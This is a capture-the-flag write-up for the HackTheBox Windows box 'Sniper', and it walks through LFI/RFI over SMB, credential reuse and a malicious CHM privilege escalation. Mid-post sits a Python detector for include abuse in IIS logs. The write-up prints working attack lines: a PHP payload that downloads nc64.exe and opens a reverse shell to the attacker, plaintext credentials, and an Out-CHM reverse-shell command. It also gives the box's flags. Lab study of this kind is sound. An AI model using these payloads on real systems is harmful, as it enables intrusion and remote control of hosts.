HackTheBox - Sniper

Summary

Sniper, a Windows box created by HackTheBox users MinatoTW and felamos, was an overall medium-to-hard difficulty box. Initial enumeration shows an LFI and an RFI vulnerability in the hosted web application; to gain access we set up a Samba server on our box and place our malicious payload inside the shared directory. Once that is done we can upload nc.exe and get a low-privilege shell. Using that shell we read the code of db.php, which contains a user's password, and use it with PowerShell Invoke-Command to get user. The privilege escalation on this box is pretty nice: you will find a .chm in the user's Downloads folder, and a note gives a nice hint. Use a malicious .chm and you will get root.

Enumeration

nmap scan

# Nmap 7.80 scan initiated Fri Dec 27 23:37:41 2019 as: nmap -sC -sV -oN nmap/sniper 10.10.10.151
Nmap scan report for 10.10.10.151
Host is up (0.15s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-12-28T11:38:06
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 27 23:38:47 2019 -- 1 IP address (1 host up) scanned in 66.10 seconds

Enumerating SMB we don't find anything interesting, so let's focus on the web server.

gobuster scan

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.151/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2019/12/27 23:44:03 Starting gobuster
===============================================================
/index.php (Status: 200)
/images (Status: 301)
/blog (Status: 301)
/user (Status: 301)
/css (Status: 301)
/js (Status: 301)

Viewing each page we see that /blog has a file inclusion vulnerability in the lang parameter. We can confirm that by viewing http://10.10.10.151/blog/?lang=./css/style.css.

Trying to use that as an RFI we see that the server can connect back to an SMB server but not to HTTP, so we set up an SMB server using Samba on Kali (smbd), as Impacket's SMB server was not working for some reason.

# Adrian's share
[share]
comment = YOUR COMMENTS
path = /your-share-folder
read only = no
guest ok = yes

I wrote a PHP script to download and execute nc.exe and get a low-privilege shell.

<?=
system("powershell IWR http://10.10.X.X:8000/nc64.exe -outfile \\Microsoft\\nc64.exe;\\Microsoft\\nc64.exe 10.10.X.X YYYY -e powershell.exe 2>&1")
?>

With a listener waiting, we get a connection back within a few seconds.
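From the defender's side, the whole chain above leaves a clear trace in the IIS access log: a lang= value that is no longer a bare filename. The following Python detector is an added example, not code from the writeup; it assumes the default IIS W3C field order and runs over constructed log lines (the 10.10.14.x client addresses and filenames are made up for the sample), flagging remote includes over HTTP or a UNC/SMB path, directory traversal, and inclusion of other local files.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt (sample data, not from the box); client addresses are made up.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2019-12-27 23:44:03 10.10.10.151 GET /blog/ lang=es.html 80 - 10.10.14.2 Mozilla/5.0 200
2019-12-27 23:45:10 10.10.10.151 GET /blog/ lang=./css/style.css 80 - 10.10.14.2 Mozilla/5.0 200
2019-12-27 23:46:31 10.10.10.151 GET /blog/ lang=..%5C..%5Cwindows%5Cwin.ini 80 - 10.10.14.2 curl/7.66.0 200
2019-12-27 23:47:02 10.10.10.151 GET /blog/ lang=http://10.10.14.2:8000/shell.php 80 - 10.10.14.2 curl/7.66.0 200
2019-12-27 23:48:15 10.10.10.151 GET /blog/ lang=%5C%5C10.10.14.2%5Cshare%5Cshell.php 80 - 10.10.14.2 curl/7.66.0 200
2019-12-27 23:49:00 10.10.10.151 GET /index.php - 80 - 10.10.14.3 Mozilla/5.0 200
"""

# A legitimate lang value is a bare filename. Anything else falls into one of these buckets.
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:)?//|^\\\\", re.IGNORECASE)  # http://host, //host, \\host
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")                   # ../ or ..\ segments

def classify_lang(value):
    """Label one URL-decoded lang= value, or return None when it looks benign."""
    if REMOTE_RE.search(value):
        return "remote-include"      # RFI over HTTP or a UNC/SMB path
    if TRAVERSAL_RE.search(value):
        return "traversal"           # LFI walking out of the blog directory
    if "/" in value or "\\" in value:
        return "unexpected-path"     # LFI of another file on the same host
    return None

def parse_iis_line(line):
    """Split one W3C line into the fields we need; skip directives and short lines."""
    f = line.split()
    if not f or f[0].startswith("#") or len(f) < 11:
        return None
    return {"time": f[1], "stem": f[4], "query": f[5], "client": f[8], "status": f[10]}

def find_include_abuse(log_text):
    """Return (time, client, label, decoded lang value) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec is None or rec["query"] == "-":
            continue
        # parse_qs percent-decodes once, matching what PHP sees in $_GET['lang'].
        for value in parse_qs(rec["query"]).get("lang", []):
            label = classify_lang(value)
            if label:
                findings.append((rec["time"], rec["client"], label, value))
    return findings
```

Running find_include_abuse(SAMPLE_LOG) flags the last four /blog/ requests and leaves the plain lang=es.html request alone; the same buckets map directly onto the fix, which is an allowlist of language files plus allow_url_include left off.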

User

Once we have a shell we enumerate the box and find db.php, which contains a password.

After some recon we find that the credentials belong to the user Chris, and the password is stored in plaintext rather than as a hash, so we can use Invoke-Command to get another shell as Chris.

$user = 'sniper\chris'
$passwd = '36mEAhz/B8xQ~2VM'
$secpass = ConvertTo-SecureString $passwd -AsPlainText -Force
$cred = new-object system.management.automation.PSCredential $user,$secpass
Invoke-Command -computername 127.0.0.1 -ScriptBlock { C:\Microsoft\nc64.exe 10.10.X.X ZZZZ -e powershell.exe } -credential $cred

Once we have the shell we can read user.txt: 21f4d0f29fc4dd867500c1ad716cf56e

Privilege Escalation

In Chris's Downloads folder we found one file, instructions.chm, and after some recon and searching we see that this file type is vulnerable to RCE.

Note: CHM is Microsoft Compiled HTML Help.

After some recon we see that C:\Docs contains a notes.txt with a hint that we need to upload a malicious CHM to get Administrator.

Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.

And I hope that you've prepared the documentation for our new app

So we create a malicious CHM using Out-CHM.ps1:

Out-CHM -Payload "c:\windows\system32\spool\drivers\color\nc.exe 10.10.X.X 1234 -e cmd" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

We upload that to the C:\Docs folder, wait a little while for the file to be opened, and get an Administrator shell.

Then we can grab root.txt: 5624caf363e2750e994f6be0b7436c15

And we have pwned Sniper 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/sniper/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.